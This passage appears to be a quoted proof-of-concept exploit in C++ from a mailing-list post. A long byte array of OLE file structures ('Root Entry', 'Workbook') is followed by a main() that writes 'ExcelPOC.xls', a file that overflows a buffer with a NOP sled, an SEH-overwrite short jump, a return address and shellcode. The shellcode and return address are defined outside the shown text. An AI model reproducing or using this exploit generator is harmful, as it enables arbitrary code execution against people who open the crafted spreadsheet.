> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x52, 0x00, 0x6F, 0x00, 0x6F,
> 0x00,
> 0x74, 0x00, 0x20, 0x00, 0x45,
> 0x00, 0x6E, 0x00, 0x74, 0x00, 0x72, 0x00, 0x79, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x16, 0x00, 0x05, 0x00, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFE,
> 0xFF,
> 0xFF, 0xFF, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x57, 0x00, 0x6F, 0x00, 0x72,
> 0x00,
> 0x6B, 0x00, 0x62, 0x00, 0x6F,
> 0x00, 0x6F, 0x00, 0x6B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x12, 0x00, 0x02, 0x00, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x8B, 0x1A, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02,
> 0x00,
> 0x00, 0x00, 0x03, 0x00, 0x00,
> 0x00, 0x04, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x06,
> 0x00,
> 0x00, 0x00, 0x07, 0x00, 0x00,
> 0x00, 0x08, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x0A,
> 0x00,
> 0x00, 0x00, 0x0B, 0x00, 0x00,
> 0x00, 0x0C, 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00, 0x00, 0xFE,
> 0xFF,
> 0xFF, 0xFF, 0xFE, 0xFF, 0xFF,
> 0xFF, 0xFD, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF
> };
>
> char *filename="ExcelPOC.xls";
>
> int main()
> {
> ofstream ofs;
>
> ofs.open(filename,ios::binary | ios::out);
>
> printf("Generating Excel File ...\n\n");
>
> for(int z=0;z<sizeof(stream1);z++)
> ofs.put(stream1[z]);
>
> ofs.put('\x2E'); // Buffer size , that we are
> going to fill = 0x152E
> ofs.put('\x15');
> ofs.put('\0');
> ofs.put('\0');
>
>
> for(int i=0;i<=seh_off;i++)
> ofs.put('\x90');
>
> ofs.put('\xEB');
> ofs.put('\x06');
> ofs.put('\x90');
> ofs.put('\x90');
>
> for(z=0;z<4;z++)
> ofs.put(ret_address[3-z]);
>
> ofs.put('\x90');
> i+=9;
>
> for(unsigned int j=0;j<strlen((const char*)shellcode);i++,j++)
> ofs.put(shellcode[j]);
>
> for(;i<=buff_size-4;i++)
> ofs.put('\x90');
>
> for(z=0;z<sizeof(stream2);z++)
> ofs.put(stream2[z]);
>
> ofs.close();
>
> printf("File Written ...\n\n");
> return 0;
> }
>
[ reply ]